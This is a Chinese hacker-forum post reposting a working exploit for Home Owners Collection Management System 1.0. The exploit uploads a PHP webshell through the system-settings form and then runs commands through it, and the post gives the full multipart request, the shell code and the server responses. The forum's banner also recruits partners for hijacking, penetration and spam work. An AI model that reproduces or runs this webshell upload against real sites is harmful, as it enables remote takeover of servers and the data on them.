跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux 

# Request sent as base user

POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215
Content-Length: 769
Origin: http://localhost
Connection: close
Referer: http://localhost/hocms/admin/?page=system_info
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju


-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="name"



Home Owners Collection Management System'

-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="short_name"



HOCMS  - PHP

-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream





-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="cover"; filename="cmd.php"
Content-Type: application/x-php



<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>


-----------------------------31935477191495174627236953215--


# Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2022 09:32:16 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



1


# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------

GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
Upgrade-Insecure-Requests: 1


# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2022 09:39:06 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Access-Control-Allow-Origin: *
Content-Length: 33
Connection: close
Content-Type: text/html; charset=UTF-8



0xSaudi
</pre>
</body>
</html>

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。